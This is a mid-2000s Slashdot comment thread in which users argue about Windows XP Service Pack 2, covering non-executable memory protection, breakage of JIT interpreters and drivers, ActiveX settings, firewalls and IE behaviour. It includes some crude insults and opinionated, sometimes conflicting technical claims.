
Breaking News: MS OS breaks own apps. Film at 11.

[Qbertino]

So what's the big deal anyway?

First of all, you CAN NOT silently install ActiveX

[melted]

It will ask you whether or not you want to do so. You can also disable ActiveX controls altogether if you want.

Another thing is, it was impossible to delete them without going to registry and ripping them out by hand. This is now possible. I also think they'll explain in greater detail to their customers that installing crap from porn sites can actually hurt their computer.

User education is their biggest problem that they have yet to identify.

Re:Tidbit from OSR - XP SP2 will break some driver

Of course, if they'd done this FROM THE START, then there would be no failures from it with the upgrade...

Similarly, if the driver guys had written good code FROM THE START, there would be no failures either. Sure, you can give Microsoft some of the blame, but the developers for the drivers are more at fault.

this is news?

I already had several apps break after patches last year. For example, the patches for RPC exploits ended up screwing up COM+ authentication on a multi-cpu box. So more likely than not, patches will break some app.

Re:First of all, you CAN NOT silently install Acti

[the_skywise]

Unless it's been changed recently... but by default the shipping version of Windows XP and all versions of IE before that... ActiveX controls install automatically when downloaded from a website.

You can shut it off, but few users do. I've had to clean all of my friends' systems because of spyware and other plug-ins installed because of it. I've told them to use FireFox (It has trouble with the hotmail website so I switched back to IE), I've switched their activeX download permissions to Ask before installing (It said I needed to install this plug-in so I said yes.), so then I turned it off (my hotmail website doesn't work so I turned it back on...)

Microsoft already "fixed" this issue by making "secure" ActiveX controls to stop malicious controls...

I'm in complete agreement that users need to be aware of what they're doing. But its misleading to say that all security issues will be resolved by programming the Microsoft Way when Microsoft continues to allow ActiveX controls and popups to fire automatically because it pads their bottom line.

To wit: The most secure Windows system is one that even Microsoft won't be able to get into. So long as Microsoft leaves one standardized back door for them to get into (Windows Update, remote desktop control, etc) All of this effort is hyperbole! It just directs the "malicious coders" to those areas.

Stop Crying Wolf

[Noehre]

As anybody that has been running the beta of SP2 probably knows, this incredible application-breaking feature is ******OPTIONAL******* and can be ****TURNED OFF IF IT PRODUCES PROBLEMS****.

Furthermore, it doesn't even work in non-Opteron processors.

I mean, people are acting like upgrading to SP2 is going to suddenly destroy their ability to use applications when this option isn't even on by default.

Certainly you people aren't this ignorant, are you?

a more informative link on XP SP2

[wotevah]

Quoting from the article linked below:

Starting with Windows XP Service Pack 2, on processors which support it (according to the web page, currently AMD K8, Itanium, and AMD64), the stack and heap will not be executable. If you try to execute the stack or the heap, an exception will be raised and the code will not execute. In other words, execute page protection will soon be enforced, now that processors exist that support it. (Actually, I believe Windows XP for Itanium already used this new protection level, so those of you who have been playing around with your Itanium may have seen this already.)

If you were a good developer and followed the rules on page protections, then this has no effect on you. But if you cheated the rules and took advantage of specific hardware implementation details, you may find yourself in trouble. Consider yourselves warned.

posted on Tuesday, November 04, 2003 3:38 AM

http://weblogs.asp.net/oldnewthing/archive/2003/11 /04/55560.aspx

Which is worse: virii or MS patches?

[OwlWhacker]

Makes you wonder which is worse, virii or Microsoft patches?

It seems to be a common occurance nowadays that Microsoft's patches screw something up.

At least with the latest batches of virii you get the choice to run them or not run them (unless you're one of those 'gotta click it' people), and you have anti-virus software to rely on.

There is no anti-patch software, and automatic updates really guarantee that your Windows machine will be screwed at some stage. I wonder if Microsoft has taken this into consideration in its TCO calculations?

Re:aa

THE INTERNET

Python Too?

[BroncoInCalifornia]

"The great bulk of applications will not be affected by memory protection. The number one that leaps to mind is execution environments with just-in-time code generation. The .Net Framework is one," Goodhew said.

.NET is not the only interpreter that generates object code on the fly. Here is my partial list of other interpreters that could get broken:

Java

Python

perl

Visual Basic?

Re:Python Too?

[Cato]

Java's JIT implementations do generate native code - the other ones just generate a bytecode, which is still data as far as the OS and CPU is concerned.

Please...

Almost all games have to be run as admin if installed in the default location. Winamp has to be run as admin to not break if installed in the default location. Most of the shareware and free software utilities I've come across have to be run as admin.

In fact, going through my Program Files directory, I have only 33 applications installed that will work fine when run as admin out of 58 total (all of which are recent versions). Sure, most of the big name professional software will work, but home users are a problem too. And even then, there are some pro apps that don't work. AutoCAD for example stores most settings per user in the registry, but customizing toolbars requires being an admin. 3ds max still uses an INI file for everything in it's own folder.

Most of this has to do with storing user settings, and there is no reason that these apps should still work this way. Unfortunately, the only encouragement MS gives to developers is the official XP logo they can put on their box. But why bother if all users created at install time are admins by default anyway? Browse the software aisles at CompUSA and look for boxes with the XP logo. How may do you see?

And no, "power user" doesn't count, since it's just a half-assed attempt for the sake of compatibility with the problem apps that were considered "legacy" in the NT4 days. You can still break almost anything not system-critical. Applications that use MS's installer can now repair themselves (basically a reinstall), but these days, there is no reason anything should have to be reinstalled to solve problems on a multi-user system whether it's the OS or the programs on it.

Re:Memory protection only on 64-bit platforms for

[AdamInParadise]

Sure, but nobody uses segmented memory anymore... All modern OSes (Windows 2K, Linux, BSD, Solaris... ) use paged memory. So my point is still valid.

MS says: You will be forced to accept "upgrades".

[Futurepower(R)]

The marketing department at Microsoft has found another was to convince people not to use any Windows OS: Customers will be forced to accept "upgrades" if they want bug fixes.

This is abuse of customer trust, and a management failure at Microsoft.

Re:Anyone?

[osssmkatz]

On the one hand, I criticize Microsoft. It is not enough to prevent the opening of a port by a server. I want them to tell me if an unusual application (not registered in set access and defaults or not a signed system process) tries to access the network.

It should do a test during setup to make sure all the componets have integrity like virus scanners check themselves.

Microsoft needs to show their serious about security by disabling ActiveX, Active Desktop, and Pop-ups. (yes, I know pop-ups will be blocked.)

I just had spyware at school yesterday that ran an made itself the active desktop so that it could do pop-ups whenever the computer started up-- proof of why it is a bad idea to have the web browser always running.

Of course, this was a Microsoft hack so the Desktop wallpaper could support any graphics format that the browser did (Windows still only natively supports bitmaps!)

(Note: ActiveX was disabled, but because adding an active desktop object was on, the second part of the code executed. (the part that controlled the active desktop).

--Sam

--Sam

Re:These are a few insecure programs that won't wo

[globalar]

"at 210Mb I can't see the majority of systems out there that really need it getting the whole thing downloaded"

Doesn't MS have all legal copies registered? A CD in the mail shouldn't be too much of an expense. Heck, one CD to every home address that signs up wouldn't even trump AOL's CD spamming. MS could use some good PR and sending out free updates in the mail, maybe with a some advertising telling users what's coming, would be good for company image and users.

The reason is actually very simple....

MSFT refuses to do more hiring to increase the number of people they have doing application compatability testing.

They also refuse to increase the number of people who work **full-time** in "sustained engineering". (I.e. the people who are supposed to be supporting shipped releases, so that the core Windows team can work on Longhorn.)

And the application compatibility testing team, while very good at what they do, can only cover so much ground so fast. Holding up XPSP2 solely to do app compat testing and the dev work to fix bugs they find is not acceptable. Especially when most of the things that are not being tested or that have problems, are either marginal products or (as others pointed out) just don't have companies behind them anymore.

Also, just like getting close to shipping any other software: much bigger issues that normally would have gotten into a service pack have been postponed or denied altogether. This is so that MSFT can do more security fixes or just get the code base stable enough for final testing and ship. That particular thing isn't necessarily solved with more people, but it is a fact of life when getting ready to ship.

So you compromise on something. In this case, it ain't gonna be security work, and it ain't gonna be XPSP2's ship date.

My last gripe on this point: When a company with $40+ billion in the bank refuses to spend it on more people, yet thinks they can have the same core development team do 4 - 5 major releases simultaneously, something's gotta give. For Longhorn, it was a firm ship date; for SP2, it's application compatibility.

No, I don't work on the app compat team. Yes, I work for MSFT.

Are you kidding?

[spitzak]

It's about time Microsoft said some old software would not work. That is the only way they can fix the system! Also this has hardly hurt Apple.

I will be quite happy to see that my software still runs on the new system. I guess there is some fear that it won't, but I really believe I have written it correctly. Apparently some people aren't so sure about their software...

PS: This is different than making a change just to put a competitor out of business. In this case the change is pretty well documented so it can easily be seen if your program fails for a clearly explained reason.

Re:Memory protection only on 64-bit platforms for

[spitzak]

FYI reading what MS has written for the programmers, it seems that what you have done is not enough and that you have to manually allocate the block of memory with the VirtualAlloc (I quote: "applications cannot execute from the default process heap or the stack").

Just wanted to mod this up, it sounds correct. I very much doubt you can switch a non-executable block, especially one that is not necessarily page-aligned, into an executable block.

Whether or not it improves XP is a moot point ..

for me if MS are still insisting on the EULA that authorizes (or a least claims to authorize) MS to install software without my knowledge. Has anyone who has read the SP2 EULA confirm whether or not it is a part of the agreement?

Atleast we get a heads up now...

[Shirov]

Attention all users planning on using the forced upgrade! You will definetly see problems once the devil spawn code is updated. You WILL lose data, your apps will stop running, and your dog will probably die. Rebooting 1000x's is the recommended solution to any and all issues encountered. Thanks for choosing Micro$oft. We hate each and everyone one of you...

Have a nice day!
Micro$oft Support.

Re:First of all, you CAN NOT silently install Acti

[f0rt0r]

I agree too. But it gets difficult ( as you pointed out ), when you have some sites you have to allow to run ActiveX controls to work properly ( and you want them to work ). Where I work, there are several thousand employees, all with different Intranet/Internet site they go to to do their respective jobs. This groups of sites changes often,so even though the default settings for MS IE security zones is preconfigured on each system we build, we have to let the end user ( employee ) change them or the work load will easily exceed what the very understaffed and recently mostly outsourced company IT staff can handle.

I was one of the lucky(???) people not to be outsourced, and I can barely keep up with the demands for new standalone/network/java/etc. applications. The remaining staff is trying to figure out a good way to configure MS IE security to stop malicious usage of ActiveX controls, and to somehow stem the installation of malicious plugins, but that is quite the challenge in a rapidly changing, demanding, chaotic environment that I call work.

As far as home users go, I don't have a clue. I recently took some time to explain to a coworker how to install/use Adaware&Spybot on his home computer, but trying to get people to use a different browser is frustrating. I don't know if they just don't comprehend the fact that you can pick the browser you use, or if they'd just rather not be bothered with changing how they access web pages. Of course, most likely, it's because learning computer "stuff" ranks right up there with "polish the door knob" on their list of priorites. :)

WinXP SP1 HA updates don't even work with MSN

[Lord_Myron]

As of 1 week ago the internet explorer update Q832894 causes MSN 8.x and 9 to have an internal error on load. If MS can't even keep compatability with their own software what hope do third party vendors have.

GCC?

[addaon]

Doesn't GCC build trampolines under the stack? Under what conditions does it do this on x86? How many applications built with GCC are going to suddenly break?

The Good and The Bad

[Maul]

The Good:

Microsoft needs to do some house cleaning of Windows, and this seems as if it really is a step in the right direction as far as fixing up some of the security problems.

The Bad:

Of course, this is Microsoft we're talking about. If Microsoft can get away with purposefully breaking third party applications and then making it seem like it is for "security" purposes, they will.

Naturally, one has to wonder what havoc this SP will cause with 3rd. party firewall and antivirus software. It is not hard to imagine Symantec and McAfee taking a huge loss in user base if SP2 breaks their software, and then Microsoft says, "Well, those apps weren't well written or else SP2 wouldn't have broken them. Fortunately firewall and antivirus are built into Windows now, so you can ditch that 3rd. party software."

And this also will not really do very much to stop the spread of viruses/worms/trojans and adware, at least not immediately. The reasons are:

1. Most home users never run Windows Update. MS can tout the new security features all they want, but most users will not have these features because they won't patch.

2. People will still find a way to purposefully click on email attachments. I've known people who can't get weird email attachments because their AV software blocks it, so they DISABLE their AV software to open it.

3. SP2 doesn't look like it will address IE/ActiveX control issues that Adware writers love to take advantage of.

And of course, Microsoft is still pushing their campaign to integrate everything and the kitchen sink into the OS. First it was IE, now it is media player that MS claims is a vital component of Windows. Next it will be firewall and antivirus. These improvements should be modular so that users who have an external firewall or prefer a 3rd. party solution can simply knock it out of their install.

Re:The Good and The Bad

[Daltorak]

SP2 doesn't include anti-virus software. It provides better integration with third-party anti-virus solutions, and that's it.

Legacy systems: The final jerk-around

wasn't one of the main arguments for choosing windows originally "choose us because we'll always have a backward-compatible option for you"..? Isn't this like microsoft breaking it's first-date promise to "always treat you with respect"? Do phb's finally feel the burn of bg's (sometimes) arrogance?

Re:Java? Re:Intuit/QuickBooks

Uh, QuickBooks is a Java app that runs in IE. 'Course, it uses only MS Java and no other. Nice torpedoing of cross-platform compatibility.

Re:Memory protection only on 64-bit platforms for

I think NX can be disabled on the Control Panel. I am not sure because the Windows XP SP2 machine i've seen didn't use an Athlon 64 or Itanium but there was a NX tab in the Control Panel.

Re:Tidbit from OSR - XP SP2 will break some driver

[f0rt0r]

Good point.I have had problems with XP SP1 , so I went back to just that base XP. Of course, I don't have to worry as must as I only use Windows for P2P/Games, everything else is done on Linux. However, I still run the Norton Internet Security package on it ( Firewall + Antivirus + Malicious Script Checking ).

"Collective conscience"

[Overly+Critical+Guy]

By collective conscience, you mean, of course, the Slashdot community, which contains members who still actually use the phrase "M$." Everyone else in the world likes Windows (really, I've asked non-Linux people, and they like it).

Slashdot started in the 90s. The bias wasn't "restricted to very small groups of hackers." I guess you forgot that there was hooplah over IE integration in Windows 98, and Slashdot covered the antitrust trial endlessly. Slashdot has been the bastion for anti-"M$" bias since its inception. "Microsoft Violates Human Rights In China", anyone?

Re:"Collective conscience"

There was evidence to prove that Overly Critical Guy is a lying cocksucker, but he deleted it. Think independently.

Cygwin Breaks.

[Jeremiah+Cornelius]

Under SP2 beta 1, Any call from the cygwin network code will core the calling application. ssh and wget and ftp and CPAN all broke on my box.

Fortunately, the uninstallation makes heavy use of system-restore points, and seems to leave no residue!

With SP2, I also had problems with Services for Unix 3.5, but this may have been unrelated...

Re:Cygwin Breaks.

[nachoboy]

Try using the native Win32 wget and PuTTY. Both have no problems on SP2 build 2055 or 2082. Cygwin is just too much bloat for me.

That said, I wouldn't install a beta SP on my production box ever. I have run through several scenarios on VMWare though, including upgrading to SP2 as well as simply installing a clean SP2-slipstreamed copy. Starting to like the changes I see. The few applications that may break are worth the collective security of the Windows population at large.

Re:Cygwin Breaks.

[Jeremiah+Cornelius]

Sure! I wouldn't do this on my "production" box either...

Whichever of these three notebooks that is!

Seriously, I already have putty and mindterm and VanDyke's stuff around. They do a good job for interactive use - but they are not part of a full shell environment for scripting. Yes, I know you can script that stuff, but every one works differently from the other - and the glue around it is MS-Batch or another WSH hosted syntax that works on the specific install you happen to have...

Pipe a series of command to a remote machine, and iterate it with a client-side counter - in putty! Sometimes cygwin pays off. We'll see if there can be enough user-land eventually built for SFU to make the switch... It is beaucoup faster!

Slashdot's double-standards

[Overly+Critical+Guy]

Slashdot bitches about Windows and its backwards-compability causing blue screens.

Then, Slashdot bitches when Microsoft breaks compability to be more secure.

Man, Slashdot's gonna have a field day when Longhorn comes out and replaces Win32 with .NET, as they're doing now...

Re:Slashdot's double-standards

There was evidence to prove that Overly Critical Guy is a lying cocksucker, but he deleted it. Think independently.

Re:Slashdot's double-standards

[pyrrhonist]

Slashdot bitches about Windows and its backwards-compability causing blue screens.
Then, Slashdot bitches when Microsoft breaks compability to be more secure.

Yes, that's right. If Microsoft were to open-source all of Windows tomorrow, we would still hate them. It doesn't matter what Microsoft does, we still hate it. Bill and Linus could be shaking hands tomorrow, but that doesn't make any of difference to us. We will still hate Microsoft just as much.

Unless it's Tuesday. Then we hate the RIAA.

.NET is replacing Win32

[Overly+Critical+Guy]

.NET was always targetted for developers anyway. Users won't need to know about .NET.

In Longhorn, .NET is replacing Win32 itself. The reecent betas are already running explorer.exe as managed code. So, users won't need to install the .NET framework because it will be part of Windows itself.

Right now, it's just a development framework to get used to.

Re:.NET is replacing Win32

There was evidence to prove that Overly Critical Guy is a lying cocksucker, but he deleted it. Think independently.

Java vs. C (again)

[Ratbert42]

Try a well written app like azureus...

While the SWT is pretty, it eats 120 megs of memory on my machine and a significant amount of CPU. The old standard BT client (whatever it's called) is more like 15 megs and much lighter on the CPU.

Actually, at work recently we've had a bit of a shootout among various XML DOMs. Our C++ code runs about 4 times slower than (my) tighter C code. But the amazing thing is that some Java code, with a highly optimizing JVM, has beaten my C by about 50%. Of course, we aren't counting startup time, but still, that sucker is fast. We think it comes down to the JVM being optimized for the P4 while the best I can do with Microsoft Visual C++ is optimizing for the Pentium Pro.

Re:Memory protection only on 64-bit platforms for

[Carewolf]

No one uses segmentation, so the feature is useless. The paging model for x86 have not had the benefit of a non-execution flag. This was introduced by AMD in x86-64, but unfortunately not copied by Intel in ia32e

Re:Memory protection only on 64-bit platforms for

wrong guess this time, VirtualProtect will work correctly, regardless of how the given region was allocated originally.

Why admin privileges required to install games?

[unixdad]

Hopefully they're cracking down on all the apps that have to run as admin.

I'd like to see them go one step further, but suspect it's only partially an OS design issue. I'm tired of (typically) MS games that require admin privileges to install. There are plenty of games that my power users (my kids) can install, but the MS games all require admin privs-- presumably so that they can make registry changes?

Re:Why admin privileges required to install games?

[Sycraft-fu]

It's generally a system software install issue. They want to install the latest version of Direct X, and often some video or audio codecs, and that needs admin privledges.

I don't really see what they problem is. I LIKE it that admin should be required to install. After all, I don't want my users going and installing crap on their systems. If I wanted them doing that, they'd be admins.

The problem is games (or other software) that won't run unless you are admin. This is broken. Windows is a multi-user OS and programs need to deal with that fact. Part of that means that non-admin users need to be able to execute programs.

Longhorn

[Overly+Critical+Guy]

Longhorn was never "postponed." They never gave a release date. Originally they were targetting late 2005, then said they would target early 2006, and haven't said a word since.

My favorite thing is when Slashdotters call it "vaporware."

Re:Longhorn

There was evidence to prove that Overly Critical Guy is a lying cocksucker, but he deleted it. Think independently.

The reason MS was ok with 2000, but horrific now.

[Eric_Cartman_South_P]

Ever since Win98, MS has the following attitude about code:

Hack hack hack hack, remove hack, hack a hack, hack hack hack...

Their code is SO CHOCK FULL OF HACKS to support older applications, and even hack to hack old hacks, that eventually the OS will crumble under its own weight.

The Apple transistion from OS 9 to OS X was VERY slick. Give old apps a Classic mode, and as apps get rewritten you use the new rewritten version in the main OS, and only dip into Classic mode for the old/unconverted apps. After a few years, get rid of the Classic mode and yay, millions of people easily converted from one generation OS to the next. Watching Apple move people from OS 9 to OS X was what caught my eye and made me think "This company has a fucking clue!" And once I saw 10.3, I bought a Powerbook. Too good to refuse.

With windows, it's still hack hack hack hack... I can't wait to be ENTERTAINED when Longhorn comes out. It's going to be a great laugh at that mess. And great for self employed geeks like me that work as consultants. MS makes a mess every couple of years, and that keeps us geeks paid cleaning up the mess.

The fix, as I see it: MS, IMO, should write Longhorn without ANY HACKS for old apps, and include with the OS a free copy of Virtual PC running Windows XP. Treat Virtual PC (which they now own) as Apple did with their Classic mode.

Of course, MS won't do this, and couldn't do it right if they tried, and at the end you still have a crappy OS full of security holes and a bad GUI. Oh well.

Isn't this JVM

Doesn't this sound like JVM?
'The number one that leaps to mind is execution environments with just-in-time code generation.'

Are the using their security initiative to break java? It has seemed obvious to me that Microsoft would use security to break competitors products. Here it looks like they are.

Developer implications - .Net

Some application behaviors are expected to be incompatible with execution protection. For example, applications that perform dynamic code generation (such as Just-In-Time code generation) that do not explicitly mark generated code with execute permission may have compatibility issues with execution protection. Note that managed code applications and components built on the Microsoft .NET Framework's common language runtime (CLR) will continue to work--the CLR is compatible with execution protection in SP2.

Application and driver developers should be aware of execution protection and the requirements of software running on a supporting platform. Applications that perform just-in-time (JIT) code generation or execute memory from the default process stack or heap should pay careful attention to execution protection requirements. The .NET Framework, for example, works with the NX bit set.

http://msdn.microsoft.com/security/productinfo/X PS P2/default.aspx?pull=/library/en-us/dnwxp/html/sec urityinxpsp2.asp

Unsecure w.r.t. tramping all over memory

[Performer+Guy]

Look, do you really want apps running that tramp all over memory the shouldn't be touching? This is a GOOD THING. SP2 isn't breaking those apps, theyr'e already broken, you just don't know it yet.

They are talking about stateful firewalls

[Sycraft-fu]

This would be how any firewall worth it's shit works. Nothing is permitted incomming by default, unless there is a rule specifying otherwise. Now, when your computer goes and establishes a connection outgoing to another computer, that is permitted by default (unless there is a rule specifying otherwise).

Question is, what happens when the data comes back? If your firewall just says "allow out, deny in" and simply evaluates each packet in a vaccuum, it would do no good. You could never establish communications since all inbound traffic would be dropped.

So, what firewalls do is keep track of connections. You send a request to a webserver, it replies. The firewall, because it's stateful, knows that the reply is a response to your request, and permits it through. However, it's for that connection only. If the same server trys to poke at you, it'll get denied, while still allowing traffic for the web connection through.

Thus a stateful firewall with two simple rules (allow out, deny in) can secure a desktop system pretty well. Anyone that pokes at the system will get nothing, but all requests that the user initiates will be allowed.

The Windows XP firewall is a pretty simple one. By default, it does just this. You can also, if you like, specify inbound ports that are to be permitted at all times. So if you run an FTP server, you can specify that port 21 be permitted. However, in it's default config, it works great for most users. It's how I configure Kerio Personal Firewall for people, barring special needs.

Re:First of all, you CAN NOT silently install Acti

[Fancia]

I've told them to use FireFox (It has trouble with the hotmail website so I switched back to IE)

What sort of problems? I use Hotmail regularly on Firefox (running Linux, although I doubt there's a difference between ports) without a problem. Have you reported it as a bug?

TOD

1. To do that you'd still have to have a Windows or Mac machine.
2. The installer includes a step which asks for your Business ID number and registered Address, and encodes it in a binary data file, so any such package would not be re-distributable.

Could but they don't

[SuperKendall]

Now while everyone can point fingers and laugh at .NET, this is very smart for them. It makes it easier and cheaper for developers to make consistant apps in current and future versions of windows. If developers rely on ms code to handle the grunt work and they just do the stuff that makes their program, then they have a lot less overhead. And with microsoft grabbing it's balls and betting on security and stability, they can handle the backend bugs with their updates. True, that requires them to actually patch, but if they start with a much more stable and efficient groundwork, you'll see a lot less patches then now.

Did you realize that .Net is undergoing a major change in Longhorn, and everyone is going to have to fix a lot of code?

While they could get the benefits you name, they have only just finished copying what's in Java and starting to think about what else they could add - that goes in Longhorn.

P.S. - You want a glimpse into the future of .Net capabilites? Take a look here. Microsoft does...

It won't get rid of them

[Sycraft-fu]

But it will certianly help to preemptively stop a class of them. Things like code red wouldn't be possible if the server properly uses the NX flag on hardware that supports it.

Of course there are still a number of problems:

1) Not all hardware supports it. Won't for a while too. Pretty much it's 64-bit AMD and Itainum for now.

2) The progam has to not screw it up. Programs will be able to request that their data area be made executable. This is necessary for things like Java. However, lazy programmers could concievably do it for their whole program, and leave open an exploit that otherwise owuld have been impossible.

3) Buffer overflows aren't the only kind of exploit out there, nor does this necessarly stop all of them. It only stops the kind that relied on sending code to a program (which goes in it's data area) screwing it up and making it execute that code, which then did what you wanted.

It is certianly a step in the right direction though. Windows has supported executable flags on memory space for a long time, but it's never been enabled in any way since it never ran on any chips that supported it in hardware.

Re:The "unsecure" list: Ans. to Why funny.

You can laugh, while wincing, or you can rage.

And if it comes down to this, you can recompile.

Regarding size of SP2

[Overly+Critical+Guy]

Some people may wonder why SP2 will be so huge of a download when it comes out. The reason is that not only have they introduced the features outlined previously, but they have recompiled many of their core system files using the latest Visual Studio and its detection in order to further remove possible exploits and overflows.

I'm looking forward to SP2 more than I was looking forward to SP1.

Re:Regarding size of SP2

There was evidence to prove that Overly Critical Guy is a lying cocksucker, but he deleted it. Think independently.

Oh get a clue

[Sycraft-fu]

This is a HARDWARE DEPENDENT feature. For this to be implemented, hardware needed to be designed that supported it. Previously, all processors (x86) that Windows ran on only supported read and write flags on memory pages. Read then also meant execute. New heardware that Windows runs on (AMD x84-64 and Intel Itainium) support read, write and execute flags. So you can have an area of memory that can be read, but not executed.

Also, Windows has long had the capability to support this sort of thing, it's just never been enabled since there hasn't been architecutre to support it. From Inside Windows 2000, 3rd ed:

"The x86 architecture doesn't implement execute-only access (that is, code can be executed in any readable page), so Windows 2000 doesn't support this option in any practical sense (though IA-64 does). Windows 2000 treats PAGE_EXECUTE_READ as PAGE_READONLY and PAGE_EXECUTE_READWRITE as PAGE_READWRITE."

The OS level support was there back in Windows 2000. Indeed programmers could and probaly should have been correctly tagging their pages, even though the hardware lacked the support to enforce it.

Now there IS hardware out there that will support it, so MS is patching their OS to enable support for it. This has got nothing to do with the worms, NT was designed from the beginning to manage memory like this. It is just now that the chips it runs on allow for it to happen.

Re:Oh get a clue

x86 hardware has supported this kind of functionality for quite some time. Read the description of the grsecurity patches for linux that implement the functional equivalent on just about all platforms that linux runs on, including x86. The difference is that Microsoft didn't want to expend the resources to implement what a single individual has been able to implement on linux.

Wouldn't work

[Sycraft-fu]

I mean, let's say that MS releases a new version of Windows that is totally incompatible with the old version. Nothing from the old version runs. What will happen? No one will buy it. It's not like the old version will stop working, they'll just keep using it.

Even WITH all the backward compatibility they have all hell getting people to upgrade. NT4 is now about 8 years old. What's more, Windows 2000 or XP are basically ideal replacements for it. They support everything NT4 did and more. Also, since they are just newer versions of the same architecture, you have almost 0 compatibility problems. In fact there are plenty of Windows 95/98 apps that wouldn't run in NT4 that run fine in 2k/XP. Finally, MS has discontinued support of NT4, what with it being 8 years old and succeded by 2 OSes.

So no one uses NT 4 any more, right? Wrong. There are still plenty of bussinesses that are dragging their feat and whining about MS cutting off support "so soon". Basically it comes down to money (they are too cheap to buy an upgrade) and the fact that it still works fine for them.

So it is highly in MS's intrest to keep their OSes backward compatible. They want that all a customer's apps will run in the current version, so there is basically no excuse (other than money) not to upgrade.

Also think about it: If MS totally broke compatibility with old versions, why not move to Linux? I mean either way you are talking needing all new apps, and Linux actually HAS some apps and is free.

No, I imagine they'll continue to support legacy software to the best of their ability.

Re:Wouldn't work

[extra88]

You are totally correct about why it's in Microsoft's best interest to make sure older software works on their newer operating systems.

So no one uses NT 4 any more, right? Wrong. There are still plenty of bussinesses that are dragging their feat and whining about MS cutting off support "so soon". Basically it comes down to money (they are too cheap to buy an upgrade) and the fact that it still works fine for them.

The problem is with the migration from NT domains to Active Directory. At this point, I think most of the NT machines out there are domain controllers. I'm sure there are a few desktops running NT Workstation just as there are desktops still running Windows 95 but those are the die-hard "if it ain't broke..." people. For the rest, it's only partly about the direct OS expense, there's also the hardware for the servers (most likely) and all the CALs for the clients. Migrating to Active Directory is a bitch; for small outfits there's a lot to learn while still trying to do their routine work and for bigger outfits there's the above mentioned expenses and the labor of dealing with so many desktops and users.

I'm sure Linux has won a number of converts who chose to switch to a Samba domain in favor of doing the AD migration. I would consider it except A) we're a part of a larger organization with which we need to interoperate and B) I really think GPOs will be very useful to us.

Re:Wouldn't work

[samael]

10,000 desktops running NT4 at my workplace (major Financial company). We're upgrading to XP at the moment, but it's a major, 6 months operation...

Oh, come on.

Isn't that the same thing everyone said about XP SP1? And XP Gold? And Windows 2000 Gold?

Personally I can't...

[the_skywise]

I'm only relaying what they told me. I've used FirxFox for the occasional hotmail session myself and haven't had problems with it.

All I know for sure is that I installed FireFox (Firebird .7) for them one time, came back a few weeks later and they were back on IE. I asked why, and they said "Hotmail problems." It's the family computer with 3 teens and they use Hotmail, AOL Messenger (they're not on AOL), Yahoo Messenger, Yahoo mail, and they ALL have this insane obsession with installing new search toolbars (spyware) into IE.

I just conceded the battle. I at least got them into the habit of running Ad Aware regularly now.
"Thanks for telling us about that Ad Aware. It really helps keep the number of pop ups down."
"Yeah, you know what REALLY keeps the pop ups down? Not using friggin IE!!! ... Oh, I'm sorry was that my out loud voice?"

BS

[melted]

Fist of all, contrary to what the poster above says, IE never had automatic ActiveX control installation by default. I don't know what he is smoking, but this was never the case.

Second of all, you can allow IE to install ActiveX automatically from trusted sites and provide your end users a list of trusted sites. Conversely, you can disable ActiveX controls from everywhere else. All of this you can do from a script (but not from within javascript running within IE) if you're local admin, automatically. You can also set up your domain logons so that users run this script when they login. There's a 1000 things you can do, but nobody seems to care to find out how, because folks at MS made their software too easy to use.

Re:BS

[f0rt0r]

No, the problem is the sites the employee need access to changes with no notification to the IT staff. So if it works, the employee will not say a word to their local ( assuming they are not in an outsourced office ) IT rep, and if it doesn't then they will report it. Once notified, the whole process of "what site is this?", "why do you need access to it", "how is it supposed to work?", etc comes into play. For example, several users at my site were given the responsibility of porting phone numbers using the Pacific Bell system, but PacBell only allows access via dialup modem into their RAS system, and with several layers of security to go through after that. For security purposes, we do not allow users to have modems or analog telephone lines as that could provide a back door into the company Intranet, bypassing firewalls, etc. This change was brought to my attention 2 weeks after the employees had given up on trying to figure out a work around on their own. And I had to learn the whole system from scratch ( I didn't even know what number porting was before that ) and figure out the best solution...which turned out to be setting up a modem bank accessible over the network using proprietary software.

This is the long way of saying, there is no iron-clad method of maintaining a complete list of every site employees need to access, though via Active Directory GPO's we can ensure the known ones are accessible.

Re:You cannot make an omelet without breaking eggs

[Kris_J]

When a windows patch disabled plain-text passwords for network authentication I worked at a place that ran a very fragile samba system on some Solaris servers. We had to edit the registry on all the PCs that received the patch so they could get to network files again. I similarly expect that if a Windows patch prevents other insecure behaviour will will need to be able to disable that too, at least for a while. Any idea if this feature can be turned off?

Not just your apps, your web content too

[Prehensile+Interacti]

I have just waded through the service pack overview, with a view to how it will impact internal software at my company.

Aside from the potential problems that will be thrown up by 3rd party apps, I believe our internal software should be fine, as it does not access the network, and we do not have NX chips (yet).

However I believe that the area we will have the biggest concern with, is found buried on page 15, and I have not found highlighted so far in any of the summaries I have read, either from them, here or other net commentary. This is in the section discussing the new behavior of Internet Explorer. I quote (empasis theirs):

In Windows XP Service Pack 2, Internet Explorer requires that all file-type information that is provided by Web servers is consistent. For example, if the MIME type of a file is "text/plain" but the MIME sniff indicates that the file is really an executable file, Internet Explorer renames the file by saving the file in the Internet Explorer cache and changes its extension. (In a MIME sniff, Internet Explorer examines, or sniffs, a file to recognize the bit signatures of certain types of files.)

We have a substantial amount of web content, of which a fair bit uses MIME types. I can see this causing weeks of QA work to ensure that we remain compatible with the market leading browser.

Oh the pain!!

Re:Not just your apps, your web content too

[jonwil]

Internet Explorers MIME type handling is, has always been and probobly will always be broken.

The correct way to handle MIME types is to treat them as gospel.
If the web server says its text/plain, treat it as text/plain regardless of content.

Re:Disable the HTML e-mail feature that I don't us

[Permission+Denied]

The plain text mode feature of Outlook Express provides users with the option to render incoming mail messages in plain text instead of HTML.

Glad to see they did a bang-up job of supporting such an innovative new feature:

The following Outlook Express features are not available when running in plain text mode:

• Full text searching through the body of a mail message.

I don't know how I could possibly continue using mutt in the face of such innovation.

So what?

[Shoten]

As for the programmers of these apps, in the words of my dad: "Screeeew them."

Everyone wants to go to heaven, but nobody wants to die. People want Windows to be more secure, but they don't want anything to change. Well, it can't be both ways, and I'm glad that Microsoft is finally starting to expect people to deal with some loss in functionality and pain in exchange for security.

Re:The reason MS was ok with 2000, but horrific no

[burns210]

Good idea, however, don't use virtualpc. vpc emulates the hardware, while something like vmware, relies on the existing hardware. This is why you can't run windows on vmware in mac, but you can run windos in vmware for linux(on an x86 box) vmware-style is less work, and will be faster...

O how i wish they would do this.

Re:These are a few insecure programs that won't wo

[BroncoInCalifornia]

Helvick,
I am trying to find out if SP2 breaks. interpeters like Java and Python. They generate object code on the fly.
Does Java work in Firefox?
Does Python work?
You can downlog the python interpeter from this site.

Microsoft doesn't care

[Kunt]

